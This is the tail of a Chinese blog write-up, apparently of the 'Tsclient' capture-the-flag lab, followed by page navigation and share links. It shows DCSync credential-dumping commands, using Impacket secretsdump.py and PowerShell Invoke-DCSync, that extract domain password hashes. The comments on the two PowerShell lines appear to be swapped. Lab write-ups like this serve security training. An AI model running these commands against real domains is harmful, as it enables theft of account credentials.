# python3 secretsdump.py domain/<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span> <span class="token attr-name">for</span> <span class="token attr-name">DCSync</span><span class="token punctuation">></span></span>:password@<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dc-ip</span><span class="token punctuation">></span></span> -dc-ip <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dc-ip</span><span class="token punctuation">></span></span> -just-dc-user <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>username</span> <span class="token attr-name">for</span> <span class="token attr-name">DCSync</span><span class="token punctuation">></span></span>
</code></pre>
<h4 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h4><pre class=" language-xml"><code class="language-xml">Import-Module .\Invoke-DCSync.ps1
​
# 导出域内所有用户的哈希值
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
​
# 导出域内指定用户的哈希值
Invoke-DCSync -DumpForest | ft -wrap -autosize
</code></pre>
<p>‍</p>
<p>最终的结果图：</p>
<p>​<img src="/Blogimages/Tsclient/image-20231021230102-0shmu2m.png" alt="image">​</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Tsclient"><span class="toc-number">1.</span> <span class="toc-text">Tsclient</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">1.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">1.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">1.3.</span> <span class="toc-text">flag3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DCSync%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.1.</span> <span class="toc-text">DCSync攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8C%95%E7%8C%B4%E6%A1%83"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">猕猴桃</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Impacket"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">Impacket</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#powershell"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">powershell</span></a></li></ol></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/22/Tsclient/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/22/Tsclient/&text=春秋云镜Tsclient"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/22/Tsclient/&is_video=false&description=春秋云镜Tsclient"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云镜Tsclient&body=Check out this article: https://qingfeng.tech/2023/10/22/Tsclient/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/22/Tsclient/&title=春秋云镜Tsclient"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/22/Tsclient/&name=春秋云镜Tsclient&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/22/Tsclient/&t=春秋云镜Tsclient"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2023
    清风
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments --><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</body>
</html>
